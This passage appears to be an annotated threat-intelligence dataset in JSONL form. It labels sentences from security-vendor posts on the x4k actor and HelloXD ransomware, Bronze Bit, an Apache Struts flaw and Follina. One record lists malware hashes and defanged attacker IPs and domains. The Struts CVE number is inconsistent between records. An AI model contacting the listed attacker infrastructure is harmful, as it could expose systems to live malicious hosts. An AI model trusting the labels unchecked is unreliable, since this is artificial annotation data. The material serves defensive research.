needs.","entities":[{"id":47207,"label":"threat-actor","start_offset":25,"end_offset":29},{"id":47208,"label":"SOFTWARE","start_offset":73,"end_offset":83}],"relations":[],"Comments":[]} {"id":2081,"text":"Most of his videos, comments, configurations and tutorials are written in Russian – and when combined with knowledge gained from a few OPSEC mistakes – Russia is also where we believe x4k originates from.","entities":[{"id":47209,"label":"threat-actor","start_offset":184,"end_offset":187},{"id":47210,"label":"location","start_offset":152,"end_offset":158}],"relations":[{"id":310,"from_id":47209,"to_id":47210,"type":"located-at"}],"Comments":[]} {"id":2082,"text":"Additionally, we encountered the ClamAV logo during one of the threat actor walkthrough videos – the same logo used on the HelloXD ransomware samples (Figure 22).","entities":[{"id":45255,"label":"malware","start_offset":123,"end_offset":130},{"id":45254,"label":"SOFTWARE","start_offset":33,"end_offset":39}],"relations":[],"Comments":[]} {"id":2083,"text":"This time around, x4k is using the logo as the start menu for his OS enviorment.","entities":[{"id":47211,"label":"threat-actor","start_offset":18,"end_offset":21}],"relations":[],"Comments":[]} {"id":2084,"text":"On the same taskbar, we also noticed the Telegram icon, which is a very popular messaging app for chatting – but is also used by threat actors such as LAPSUS$ to post news into specific channels.","entities":[{"id":6199,"label":"threat-actor","start_offset":151,"end_offset":158},{"id":47212,"label":"SOFTWARE","start_offset":41,"end_offset":49}],"relations":[],"Comments":[]} {"id":2085,"text":"Using his username and alias and pivot, we were able to identify two Telegram accounts sharing the same picture as observed before, and descriptions pointing to the threat actor’s main site фсб[.]com.","entities":[{"id":47213,"label":"DOMAIN","start_offset":190,"end_offset":199},{"id":47214,"label":"SOFTWARE","start_offset":69,"end_offset":77}],"relations":[],"Comments":[]} {"id":2086,"text":"We noticed that the x4k Telegram account is used actively versus the old account – which, according to Telegram, hasn’t been active in a while (Figure 23).","entities":[{"id":47215,"label":"threat-actor","start_offset":20,"end_offset":23},{"id":47216,"label":"SOFTWARE","start_offset":24,"end_offset":32},{"id":47217,"label":"SOFTWARE","start_offset":103,"end_offset":111}],"relations":[],"Comments":[]} {"id":2087,"text":" x4k has a very solid online presence, which has enabled us to uncover much of his activity in these last two years.","entities":[{"id":47219,"label":"TIME","start_offset":101,"end_offset":115},{"id":47218,"label":"threat-actor","start_offset":1,"end_offset":4}],"relations":[],"Comments":[]} {"id":2088,"text":"This threat actor has done little to hide malicious activity, and is probably going to continue this behavior.","entities":[],"relations":[],"Comments":[]} {"id":2089,"text":"Unit 42 research encountered HelloXD, a ransomware family in its initial stages – but already intending to impact organizations.","entities":[{"id":6214,"label":"identity","start_offset":0,"end_offset":7},{"id":6215,"label":"malware","start_offset":29,"end_offset":36}],"relations":[],"Comments":[]} {"id":2090,"text":"While the ransomware functionality is nothing new, during our research, following the lines, we found out the ransomware is most likely developed by a threat actor named x4k.","entities":[{"id":47220,"label":"threat-actor","start_offset":170,"end_offset":173}],"relations":[],"Comments":[]} {"id":2092,"text":"Unit 42 was able to uncover additional x4k activity being linked to malicious infrastructure, and additional malware besides the initial ransomware sample, going back to 2020.","entities":[{"id":47223,"label":"threat-actor","start_offset":39,"end_offset":42},{"id":47222,"label":"identity","start_offset":0,"end_offset":7},{"id":47224,"label":"TIME","start_offset":170,"end_offset":174}],"relations":[],"Comments":[]} {"id":2093,"text":" Ransomware is a lucrative operation if done correctly.","entities":[],"relations":[],"Comments":[]} {"id":2094,"text":"Unit 42 has observed ransom demands and average payments going up in the latest Ransomware Threat Report.","entities":[{"id":47225,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":2095,"text":"Unit 42 believes that x4k, this threat actor, is now expanding into the ransomware business to capitalize on some of the gains other ransomware groups are making.","entities":[{"id":47226,"label":"identity","start_offset":0,"end_offset":7},{"id":47227,"label":"threat-actor","start_offset":22,"end_offset":25}],"relations":[],"Comments":[]} {"id":2096,"text":" Palo Alto Networks detects and prevents HelloXD and x4k activity in the following ways: If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:","entities":[{"id":47231,"label":"identity","start_offset":181,"end_offset":211},{"id":47228,"label":"identity","start_offset":1,"end_offset":19},{"id":47229,"label":"malware","start_offset":41,"end_offset":48},{"id":47230,"label":"threat-actor","start_offset":53,"end_offset":56}],"relations":[],"Comments":[]} {"id":2097,"text":"Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.","entities":[{"id":45261,"label":"identity","start_offset":115,"end_offset":136},{"id":45260,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":2098,"text":"CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.","entities":[{"id":47232,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":2099,"text":"Learn more about the Cyber Threat Alliance.","entities":[{"id":47233,"label":"identity","start_offset":21,"end_offset":42}],"relations":[],"Comments":[]} {"id":2100,"text":" 435781ab608ff908123d9f4758132fa45d459956755d27027a52b8c9e61f9589 ebd310cb5f63b364c4ce3ca24db5d654132b87728babae4dc3fb675266148fe9 65ccbd63fbe96ea8830396c575926af476c06352bb88f9c22f90de7bb85366a3 903c04976fa6e6721c596354f383a4d4272c6730b29eee00b0ec599265963e74 7247f33113710e5d9bd036f4c7ac2d847b0bf2ac2769cd8246a10f09d0a41bab 4e9d4afc901fa1766e48327f3c9642c893831af310bc18ccf876d44ea4efbf1d 709b7e8edb6cc65189739921078b54f0646d38358f9a8993c343b97f3493a4d9 0e1aa5bb7cdccacfa8cbfe1aa71137b361bea04252fff52a9274b32d0e23e3aa 1fafe53644e1bb8fbc9d617dd52cd7d0782381a9392bf7bcab4db77edc20b58b 3477b704f6dceb414dad49bf8d950ef55205ffc50d2945b7f65fb2d5f47e4894 3eb1a41c86b3846d33515536c760e98f5cf0a741c682227065cbafea9d350806 4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b 4de1279596cf5e0b2601f8b719b5240cb00b70c0d6aa0c11e2f32bc3ded020aa 4ea43678c3f84a66ce93cff50b11aabbe28c99c058e7043f275fea3456f55b88 5ae0d9e7ae61f3afb989aaf8e36eda1816ec44ceae666aea87a9fdc6fed35594 667b8abb731656c83f2f53815be68cce5d1ace3cb4ed242c9fecd4a66ac2f816 78ae3726d5b0815ad2e5a775ecf1a6cd36e1eeeee133b0766158a6b107ef7c34 7da83a27e4d788ca33b8b05d365fdf803cb68e0df4d69942ba9b7bde54619322 8a02f01cc3ac71b2c440148fd51b44e260a953e4fc1ee1c3fe787395b8c712ab 963cacd7eeebfb09950668bf1c6adf5452b992fc09119835cd256c5d3cf17f91 a57b1cfd3e801305856cdb75839de05f03439e264ccdbd1497685878a2605b5a bd111240c24a6a188f2664eb15195630b13aa6d9483fc8cfed339dddf803fd4e d8026801e1b78d9bdcb4954c194748d0fdc631594899b29a2746ae425b8bfc79 d8db562070b06d835721413a98f757b88d59277bf638467fda2ee254afc692a0 d97d666239cc973a38dc788bf017f5d8ae19257561888b61ecff8e086c4e3ea0 19d7e899777fbe432b2c90b992604599706b4109c3ceaa7946e8548f4c190a19 1dbf8ae62cc90c837ba12ceee08a1d989732a95bdcef5ca18151ef698ed98a03 22b32bb7c791842a6aa604d08208b13db07ccd1fe81f47ea8369537addb26c7b 26019b86686c1038326f075663d79803e4412bf9952eae65d7b9278be74ac55c 26cccc7e9155bd746e3bb963d40d6edfc001e6d936faf9392202e3788996105a 43fa55c88453db0de0c22f3eb0b11d1db9286f3ee423e82704fdce506d3af516 4564ca0c436fde9e76f5fa65cbcf483adf1fbfa3d7369b7bb67d2c95457f6bc5 585a22e822ade633cee349fd0a9e6a7d083de250fb56189d5a29d3fc5468680c 592b1e55ceef3b8a1ecb28721ebf2e8edd109b9b492cf3c0c0d30831c7432e00 611f3b0ed65dc98a0d7f5c57512212c6ab0a5de5d6bbf7131d3b7ebf360773c6 6b437208dfb4a7906635e16a5cbb8a1719dc49c51e73b7783202ab018181b616 6e8ececfdc74770885f9dc63b4b2316e8c4a011fd9e382c1ba7c4f09f256925d 99f97a47d8d60b8fa65b4ddaf5f43e4352765a91ab053ceb8a3162084df7d099 9e2524b2eaf5248eed6b2d20ae5144fb3bb543647cf612e5ca52135d16389f1a c15111a5f33b3c51a26f814b64c891791ff21104ee75a4773fef86dfc7a8e7ca cd9908f50c9dd97a2ce22ee57ba3e014e204369e5b75b88cefb270dc44a5ca50 ddc96ac931762065fc085be8138c38f2b6b52095a42b34bc415c9572de17386a e9b832fa02235b95a65ad716342d01ae87fcdb686b448e8462d6e86c1f4b3156 f055577220c7dc4be46510b9fed4ecfa78920025d1b2ac5853b5bf7ea136cf37 f7ae6b5ed444abfceda7217b9158895ed28cfdd946bf3e5c729570a5c29d5d82 b843d7498506ddc272e183bbe90cf73cc4779b37341108e002923aa938ca9169 77dec8fc40ff9332eb6d40ded23d606c88d9fa3785a820ea7b1ef0d12a5c4447 f52fb7ba5061ee4144439ff652c0b4f3cf941fe37fbd66e9d7672dd213fbcdb2 beee37fb9cf3e02121b2169399948c1b0830a626d4ed27a617813fa67dd91d58 b4c11c97d23ea830bd13ad4a05a87be5d8cc55ebdf1e1b458fd68bea71d80b54 f1425cff3d28afe5245459afa6d7985081bc6a62f86dce64c63daeb2136d7d2c c619edb3fa8636c50b59a42d0bdc4c71cbd46a0586b683773e9a5e509f688176 50a479f16713d03b95103e0a95a3d575b7263bd16c334258eefa3ae8f46e3d1d 83b5c6d73f3fc893dbd7effa7c50dc9b2455ec053aa9c51d70e13305ecf21fa4 02894fa01c9b82dcfd93e35f49a0d5408f7f4f8a25f33ad17426bb00afa71f63 98ba86c1273b5e8d68ce90ac1745d16335c5e04ec76e8c58448ae6c91136fc4d 5fa5b5dddfe588791b59c945beba1f57a74bd58b53a09d38ac8a8679a0541f16 164[.]68[.]114[.]29 167[.]86[.]87[.]27 63[.]250[.]53[.]180 45[.]15[.]19[.]130 46[.]39[.]229[.]17 www.zxlab.iol4cky[.]men btc-trazer[.]xyz sandbox[.]x4k[.]me malware[.]x4k[.]me f[.]x4k[.]me 0[.]x4k[.]me pwn[.]x4k[.]me docker[.]x4k[.]me apk[.]x4k[.]me x4k[.]me powershell[.]services vmi378732[.]contaboserver[.]net x4k[.]in L4cky[.]men m[.]x4k[.]me mx2[.]l4cky[.]com mailhost[.]l4cky[.]com www1[.]l4cky[.]com authsmtp[.]l4cky[.]com ns[.]l4cky[.]com mailer[.]l4cky[.]com imap2[.]l4cky[.]com ns2[.]l4cky[.]com server[.]l4cky[.]com auth[.]l4cky[.]com remote[.]l4cky[.]com mx10[.]l4cky[.]com ms1[.]l4cky[.]com mx5[.]l4cky[.]com relay2[.]l4cky[.]com ns1[.]l4cky[.]com email[.]l4cky[.]com imap[.]l4cky[.]com mail[.]x4k[.]me repo[.]x4k[.]me bw[.]x4k[.]me collabora[.]x4k[.]me cloud[.]x4k[.]me yacht[.]x4k[.]me book[.]x4k[.]me teleport[.]x4k[.]me subspace[.]x4k[.]me windows[.]x4k[.]me sf[.]x4k[.]me dc-b00e12923fb6.l4cky[.]men box[.]l4cky[.]men mail[.]l4cky[.]men www[.]l4cky[.]men mta-sts[.]l4cky[.]men ldap[.]l4cky[.]men cloud[.]l4cky[.]men office[.]l4cky[.]men rexdooley[.]ml relay2[.]kuimvd[.]ru ns2[.]webmiting[.]ru https:\/\/фсб[.]com 2022 Unit 42 Ransomware Threat Report Highlights Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":45262,"label":"SHA2","start_offset":1,"end_offset":65},{"id":45264,"label":"SHA2","start_offset":131,"end_offset":195},{"id":45265,"label":"SHA2","start_offset":196,"end_offset":260},{"id":45267,"label":"SHA2","start_offset":326,"end_offset":390},{"id":45268,"label":"SHA2","start_offset":391,"end_offset":455},{"id":45271,"label":"SHA2","start_offset":587,"end_offset":651},{"id":45272,"label":"SHA2","start_offset":652,"end_offset":716},{"id":45278,"label":"SHA2","start_offset":1042,"end_offset":1106},{"id":45294,"label":"SHA2","start_offset":2082,"end_offset":2146},{"id":45325,"label":"IPV4","start_offset":3768,"end_offset":3786},{"id":45263,"label":"SHA2","start_offset":66,"end_offset":130},{"id":45284,"label":"SHA2","start_offset":1432,"end_offset":1496},{"id":45285,"label":"SHA2","start_offset":1497,"end_offset":1561},{"id":45286,"label":"SHA2","start_offset":1562,"end_offset":1626},{"id":45324,"label":"IPV4","start_offset":3748,"end_offset":3767},{"id":45280,"label":"SHA2","start_offset":1172,"end_offset":1236},{"id":45292,"label":"SHA2","start_offset":1952,"end_offset":2016},{"id":45293,"label":"SHA2","start_offset":2017,"end_offset":2081},{"id":45295,"label":"SHA2","start_offset":2147,"end_offset":2211},{"id":45299,"label":"SHA2","start_offset":2407,"end_offset":2471},{"id":45303,"label":"SHA2","start_offset":2602,"end_offset":2666},{"id":45266,"label":"SHA2","start_offset":261,"end_offset":325},{"id":45269,"label":"SHA2","start_offset":457,"end_offset":521},{"id":45270,"label":"SHA2","start_offset":522,"end_offset":586},{"id":45275,"label":"SHA2","start_offset":847,"end_offset":911},{"id":45276,"label":"SHA2","start_offset":912,"end_offset":976},{"id":45277,"label":"SHA2","start_offset":977,"end_offset":1041},{"id":45279,"label":"SHA2","start_offset":1107,"end_offset":1171},{"id":45281,"label":"SHA2","start_offset":1237,"end_offset":1301},{"id":45282,"label":"SHA2","start_offset":1302,"end_offset":1366},{"id":45283,"label":"SHA2","start_offset":1367,"end_offset":1431},{"id":45287,"label":"SHA2","start_offset":1627,"end_offset":1691},{"id":45289,"label":"SHA2","start_offset":1757,"end_offset":1821},{"id":45290,"label":"SHA2","start_offset":1822,"end_offset":1886},{"id":45291,"label":"SHA2","start_offset":1887,"end_offset":1951},{"id":45296,"label":"SHA2","start_offset":2212,"end_offset":2276},{"id":45297,"label":"SHA2","start_offset":2277,"end_offset":2341},{"id":45298,"label":"SHA2","start_offset":2342,"end_offset":2406},{"id":45301,"label":"SHA2","start_offset":2472,"end_offset":2536},{"id":45302,"label":"SHA2","start_offset":2537,"end_offset":2601},{"id":45304,"label":"SHA2","start_offset":2667,"end_offset":2731},{"id":45309,"label":"SHA2","start_offset":2927,"end_offset":2991},{"id":45311,"label":"SHA2","start_offset":3057,"end_offset":3121},{"id":45318,"label":"SHA2","start_offset":3512,"end_offset":3576},{"id":45319,"label":"SHA2","start_offset":3577,"end_offset":3641},{"id":45320,"label":"SHA2","start_offset":3642,"end_offset":3706},{"id":45321,"label":"IPV4","start_offset":3708,"end_offset":3727},{"id":45322,"label":"IPV4","start_offset":3729,"end_offset":3747},{"id":45326,"label":"IPV4","start_offset":3787,"end_offset":3805},{"id":45305,"label":"SHA2","start_offset":2732,"end_offset":2796},{"id":45306,"label":"SHA2","start_offset":2797,"end_offset":2861},{"id":45308,"label":"SHA2","start_offset":2862,"end_offset":2926},{"id":45310,"label":"SHA2","start_offset":2992,"end_offset":3056},{"id":45312,"label":"SHA2","start_offset":3122,"end_offset":3186},{"id":45313,"label":"SHA2","start_offset":3187,"end_offset":3251},{"id":45314,"label":"SHA2","start_offset":3252,"end_offset":3316},{"id":45315,"label":"SHA2","start_offset":3317,"end_offset":3381},{"id":45316,"label":"SHA2","start_offset":3382,"end_offset":3446},{"id":45317,"label":"SHA2","start_offset":3447,"end_offset":3511},{"id":45327,"label":"DOMAIN","start_offset":3806,"end_offset":3829},{"id":45328,"label":"DOMAIN","start_offset":3830,"end_offset":3846},{"id":45329,"label":"DOMAIN","start_offset":3847,"end_offset":3865},{"id":45331,"label":"DOMAIN","start_offset":3885,"end_offset":3897},{"id":45335,"label":"DOMAIN","start_offset":3944,"end_offset":3958},{"id":45343,"label":"DOMAIN","start_offset":4056,"end_offset":4073},{"id":45344,"label":"DOMAIN","start_offset":4074,"end_offset":4096},{"id":45345,"label":"DOMAIN","start_offset":4097,"end_offset":4115},{"id":45346,"label":"DOMAIN","start_offset":4116,"end_offset":4138},{"id":45347,"label":"DOMAIN","start_offset":4139,"end_offset":4155},{"id":45348,"label":"DOMAIN","start_offset":4156,"end_offset":4176},{"id":45349,"label":"DOMAIN","start_offset":4177,"end_offset":4196},{"id":45330,"label":"DOMAIN","start_offset":3866,"end_offset":3884},{"id":45332,"label":"DOMAIN","start_offset":3898,"end_offset":3910},{"id":45333,"label":"DOMAIN","start_offset":3911,"end_offset":3925},{"id":45334,"label":"DOMAIN","start_offset":3926,"end_offset":3943},{"id":45337,"label":"DOMAIN","start_offset":3959,"end_offset":3967},{"id":45340,"label":"DOMAIN","start_offset":3990,"end_offset":4030},{"id":45341,"label":"DOMAIN","start_offset":4031,"end_offset":4042},{"id":45342,"label":"DOMAIN","start_offset":4043,"end_offset":4055},{"id":45367,"label":"DOMAIN","start_offset":4476,"end_offset":4492},{"id":45338,"label":"DOMAIN","start_offset":3968,"end_offset":3989},{"id":45363,"label":"DOMAIN","start_offset":4409,"end_offset":4424},{"id":45365,"label":"DOMAIN","start_offset":4441,"end_offset":4454},{"id":45368,"label":"DOMAIN","start_offset":4493,"end_offset":4509},{"id":45369,"label":"DOMAIN","start_offset":4510,"end_offset":4525},{"id":45371,"label":"DOMAIN","start_offset":4526,"end_offset":4545},{"id":45380,"label":"DOMAIN","start_offset":4682,"end_offset":4703},{"id":45382,"label":"DOMAIN","start_offset":4723,"end_offset":4742},{"id":45383,"label":"DOMAIN","start_offset":4743,"end_offset":4763},{"id":45350,"label":"DOMAIN","start_offset":4197,"end_offset":4214},{"id":45351,"label":"DOMAIN","start_offset":4215,"end_offset":4235},{"id":45352,"label":"DOMAIN","start_offset":4236,"end_offset":4254},{"id":45353,"label":"DOMAIN","start_offset":4255,"end_offset":4275},{"id":45354,"label":"DOMAIN","start_offset":4276,"end_offset":4294},{"id":45355,"label":"DOMAIN","start_offset":4295,"end_offset":4312},{"id":45356,"label":"DOMAIN","start_offset":4313,"end_offset":4330},{"id":45357,"label":"DOMAIN","start_offset":4331,"end_offset":4351},{"id":45360,"label":"DOMAIN","start_offset":4370,"end_offset":4389},{"id":45361,"label":"DOMAIN","start_offset":4390,"end_offset":4408},{"id":45366,"label":"DOMAIN","start_offset":4455,"end_offset":4475},{"id":45372,"label":"DOMAIN","start_offset":4546,"end_offset":4565},{"id":45373,"label":"DOMAIN","start_offset":4566,"end_offset":4584},{"id":45375,"label":"DOMAIN","start_offset":4585,"end_offset":4598},{"id":45376,"label":"DOMAIN","start_offset":4599,"end_offset":4626},{"id":45377,"label":"DOMAIN","start_offset":4627,"end_offset":4644},{"id":45378,"label":"DOMAIN","start_offset":4645,"end_offset":4663},{"id":45379,"label":"DOMAIN","start_offset":4664,"end_offset":4681},{"id":45381,"label":"DOMAIN","start_offset":4704,"end_offset":4722},{"id":45384,"label":"DOMAIN","start_offset":4764,"end_offset":4778},{"id":45358,"label":"DOMAIN","start_offset":4352,"end_offset":4369},{"id":45364,"label":"DOMAIN","start_offset":4425,"end_offset":4440},{"id":45385,"label":"DOMAIN","start_offset":4779,"end_offset":4799},{"id":45386,"label":"DOMAIN","start_offset":4800,"end_offset":4820},{"id":45389,"label":"TIME","start_offset":4840,"end_offset":4844},{"id":6255,"label":"SHA2","start_offset":717,"end_offset":781},{"id":6256,"label":"SHA2","start_offset":782,"end_offset":846},{"id":6270,"label":"SHA2","start_offset":1692,"end_offset":1756},{"id":6306,"label":"URL","start_offset":4821,"end_offset":4838},{"id":6308,"label":"identity","start_offset":4845,"end_offset":4852}],"relations":[],"Comments":[]} {"id":2101,"text":"Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2102,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2103,"text":"This post is also available in: 日本語 (Japanese) A recent vulnerability in the Kerberos authentication protocol, CVE-2020-17049 (dubbed Bronze Bit), has been disclosed by Microsoft.","entities":[{"id":45392,"label":"identity","start_offset":175,"end_offset":184},{"id":45390,"label":"vulnerability","start_offset":117,"end_offset":131},{"id":45393,"label":"SOFTWARE","start_offset":83,"end_offset":91},{"id":45391,"label":"vulnerability","start_offset":140,"end_offset":150}],"relations":[{"id":95,"from_id":45391,"to_id":45390,"type":"duplicate-of"}],"Comments":[]} {"id":2104,"text":"The vulnerability is in the way that the Key Distribution Center (KDC) handles service tickets and validates whether delegation is allowed.","entities":[],"relations":[],"Comments":[]} {"id":2105,"text":" In the attack, as detailed in the Palo Alto Networks Security Operations blog, “Protecting Against the Bronze Bit Vulnerability with Cortex XDR,” the attacker tampers with the Kerberos service ticket, which allows the attacker to authenticate to the target as any user, including sensitive accounts and members of the “Protected Users” group.","entities":[{"id":47238,"label":"vulnerability","start_offset":104,"end_offset":128},{"id":47239,"label":"SOFTWARE","start_offset":134,"end_offset":144},{"id":47240,"label":"SOFTWARE","start_offset":177,"end_offset":185},{"id":47237,"label":"identity","start_offset":35,"end_offset":73}],"relations":[],"Comments":[]} {"id":2106,"text":" The vulnerability was patched by Microsoft, and the patch will be gradually deployed with upcoming Windows updates.","entities":[{"id":45394,"label":"identity","start_offset":34,"end_offset":43},{"id":45395,"label":"SOFTWARE","start_offset":100,"end_offset":107}],"relations":[],"Comments":[]} {"id":2107,"text":"Microsoft aims to enforce using the patch only on or after May 11, 2021.","entities":[{"id":47242,"label":"identity","start_offset":0,"end_offset":9},{"id":47243,"label":"TIME","start_offset":59,"end_offset":71}],"relations":[],"Comments":[]} {"id":2108,"text":" Palo Alto Network customers running Cortex XDR version 7.3 with the latest content update are protected from “Pass-the-Ticket” attacks using the standard Windows API.","entities":[{"id":47244,"label":"identity","start_offset":1,"end_offset":18},{"id":47245,"label":"SOFTWARE","start_offset":37,"end_offset":59},{"id":47246,"label":"attack-pattern","start_offset":110,"end_offset":135},{"id":47247,"label":"SOFTWARE","start_offset":155,"end_offset":166}],"relations":[],"Comments":[]} {"id":2109,"text":"Customers running Cortex XDR Pro with analytics enabled will get alerted on related suspicious activities and specifically on a delegation from or to a protected user. Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":45397,"label":"identity","start_offset":169,"end_offset":187},{"id":45396,"label":"SOFTWARE","start_offset":18,"end_offset":32}],"relations":[],"Comments":[]} {"id":2110,"text":"Sign up to receive the latest news, cyber threat intelligence and research from us","entities":[],"relations":[],"Comments":[]} {"id":2111,"text":" Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2112,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2113,"text":"Situation Overview","entities":[],"relations":[],"Comments":[]} {"id":2114,"text":"On August 22, 2018, the Apache Foundation released a critical security update for CVE-2018-1176, a remote code execution vulnerability affecting Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16.","entities":[{"id":47248,"label":"TIME","start_offset":3,"end_offset":18},{"id":47249,"label":"vulnerability","start_offset":82,"end_offset":95},{"id":47252,"label":"SOFTWARE","start_offset":145,"end_offset":199},{"id":47250,"label":"vulnerability","start_offset":99,"end_offset":134}],"relations":[{"id":311,"from_id":47252,"to_id":47249,"type":"has"},{"id":312,"from_id":47252,"to_id":47250,"type":"has"}],"Comments":[]} {"id":2115,"text":"The Apache Foundation has urged everyone to apply the security updates as soon as possible.","entities":[{"id":45398,"label":"identity","start_offset":4,"end_offset":21}],"relations":[],"Comments":[]} {"id":2116,"text":"This blog is to provide information to help organizations assess their risk of the vulnerability and to inform Palo Alto Networks customers of protections in place that can help mitigate their risk until they can apply the security updates.","entities":[{"id":47254,"label":"identity","start_offset":111,"end_offset":129}],"relations":[],"Comments":[]} {"id":2117,"text":"Palo Alto Networks customers who have deployed the latest vulnerability signatures released on August 24, 2018, are protected.","entities":[{"id":47255,"label":"identity","start_offset":0,"end_offset":18},{"id":47256,"label":"TIME","start_offset":95,"end_offset":110}],"relations":[],"Comments":[]} {"id":2118,"text":" Vulnerability Information","entities":[],"relations":[],"Comments":[]} {"id":2119,"text":"According to both the Apache Foundation and security researcher Man Yue Mo, this vulnerability can enable remote code execution on a server running a vulnerable version of Apache Struts.","entities":[{"id":47257,"label":"identity","start_offset":22,"end_offset":39},{"id":47258,"label":"identity","start_offset":64,"end_offset":74},{"id":47259,"label":"attack-pattern","start_offset":106,"end_offset":127},{"id":47260,"label":"SOFTWARE","start_offset":172,"end_offset":185}],"relations":[],"Comments":[]} {"id":2120,"text":"The method of attack would be through a specially crafted URL sent to the vulnerable system.","entities":[],"relations":[],"Comments":[]} {"id":2121,"text":"In most cases, this means no authentication is required to exploit the vulnerability.","entities":[],"relations":[],"Comments":[]} {"id":2122,"text":"A successful attack would run code in the security context that Struts is using.","entities":[{"id":47261,"label":"SOFTWARE","start_offset":64,"end_offset":70}],"relations":[],"Comments":[]} {"id":2123,"text":"In some cases, this could effectively lead to a total compromise of the system.","entities":[],"relations":[],"Comments":[]} {"id":2124,"text":"It’s important to note, however, that the vulnerability is not exploitable in default configurations.","entities":[],"relations":[],"Comments":[]} {"id":2125,"text":"The following two conditions must both be met for a system to be vulnerable to attack: If your Struts application does not meet both of these conditions, your application may still be vulnerable but not (currently) exploitable via CVE-2018-11776.","entities":[{"id":47262,"label":"vulnerability","start_offset":232,"end_offset":246},{"id":47263,"label":"SOFTWARE","start_offset":96,"end_offset":102}],"relations":[],"Comments":[]} {"id":2126,"text":"In particular, if your application uses the popular Struts Convention plugin, it appears to potentially increase your risk of exploitability vis-à-vis other Struts implementations that do not use that plugin.","entities":[{"id":47265,"label":"SOFTWARE","start_offset":52,"end_offset":58},{"id":47266,"label":"SOFTWARE","start_offset":157,"end_offset":163}],"relations":[],"Comments":[]} {"id":2127,"text":" Threat Environment Information","entities":[],"relations":[],"Comments":[]} {"id":2128,"text":"The vulnerability was disclosed on August 22 in conjunction with security updates that address it.","entities":[{"id":47267,"label":"TIME","start_offset":35,"end_offset":44}],"relations":[],"Comments":[]} {"id":2129,"text":"There is detailed information about the vulnerability and how to exploit it available currently.","entities":[],"relations":[],"Comments":[]} {"id":2130,"text":"There is also proof of concept (PoC) code available already.","entities":[],"relations":[],"Comments":[]} {"id":2131,"text":"As noted above, the PoC works only against systems that are vulnerable and meet both conditions for exploitability.","entities":[],"relations":[],"Comments":[]} {"id":2132,"text":"Some have noted that a previous critical Struts vulnerability was actively attacked last year only three days after the release of the security update and vulnerability information.","entities":[{"id":47268,"label":"SOFTWARE","start_offset":41,"end_offset":47}],"relations":[],"Comments":[]} {"id":2133,"text":"There are no known active attacks at this time and the current requirement that two, non-default conditions need to be met for the vulnerability to be exploitable makes for a different threat environment.","entities":[],"relations":[],"Comments":[]} {"id":2134,"text":"However with active PoC available we can expect at the minimum probing, if not active exploitation of this vulnerability in the near term.","entities":[],"relations":[],"Comments":[]} {"id":2135,"text":"Organizations should focus their risk assessments for possible attack until they can patch on four things: Guidance and Protections for Palo Alto Networks Customers","entities":[{"id":47269,"label":"identity","start_offset":137,"end_offset":155}],"relations":[],"Comments":[]} {"id":2136,"text":"All organizations running vulnerable versions of Apache Struts should deploy the security updates as soon as possible.","entities":[{"id":45399,"label":"SOFTWARE","start_offset":49,"end_offset":62}],"relations":[],"Comments":[]} {"id":2137,"text":"Organizations can and should prioritize scheduling and deployment of the security updates based on their security policy and risk assessment, and on currently available information.","entities":[],"relations":[],"Comments":[]} {"id":2138,"text":"Palo Alto Networks customers who have deployed vulnerability signatures in content release version 8057 released on August 24, 2018, which include ID 33948 Name: Apache Struts 2 Remote Code Execution Vulnerability, are protected against currently known exploits against that vulnerability.","entities":[{"id":47271,"label":"TIME","start_offset":116,"end_offset":131},{"id":47270,"label":"identity","start_offset":0,"end_offset":18},{"id":47272,"label":"SOFTWARE","start_offset":162,"end_offset":177},{"id":47273,"label":"vulnerability","start_offset":178,"end_offset":213}],"relations":[],"Comments":[]} {"id":2139,"text":"Our customers should still deploy the security update as recommended above, but can and should deploy the latest vulnerability signature immediate for additional protection.","entities":[],"relations":[],"Comments":[]} {"id":2140,"text":"With this addition protection available, our customers can and should include that as part of their decisions around security and deployment of the security updates and their risk assessment of the vulnerability and threat environment.","entities":[],"relations":[],"Comments":[]} {"id":2141,"text":"As always, we are monitoring the situation closely and will provide additional details as they become available. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2142,"text":"This post is also available in: 日本語 (Japanese) ","entities":[],"relations":[],"Comments":[]} {"id":2143,"text":"On May 27, 2022, details began to emerge of malicious Word documents leveraging remote templates to execute PowerShell via the ms-msdt Office URL protocol.","entities":[{"id":47274,"label":"tools","start_offset":108,"end_offset":118},{"id":47275,"label":"TIME","start_offset":3,"end_offset":15},{"id":47276,"label":"SOFTWARE","start_offset":54,"end_offset":59}],"relations":[],"Comments":[]} {"id":2144,"text":"The use of this technique appeared to allow attackers to bypass local Office macro policies to execute code within the context of Word.","entities":[{"id":47277,"label":"SOFTWARE","start_offset":130,"end_offset":134}],"relations":[],"Comments":[]} {"id":2145,"text":"Microsoft has since released protection guidance and assigned CVE-2022-30190 to this vulnerability.","entities":[{"id":45400,"label":"vulnerability","start_offset":62,"end_offset":76},{"id":45401,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":2146,"text":" Due to the amount of publicly available information, ease of use, and the extreme effectiveness of this exploit, Palo Alto Networks is providing this threat brief to make our customers aware of this critical vulnerability and the options available to ensure proper protections are put into place until a patch can be issued by Microsoft. The vulnerability enables remote code execution with the same privileges as the calling application and there are proof-of-concept examples of zero-click 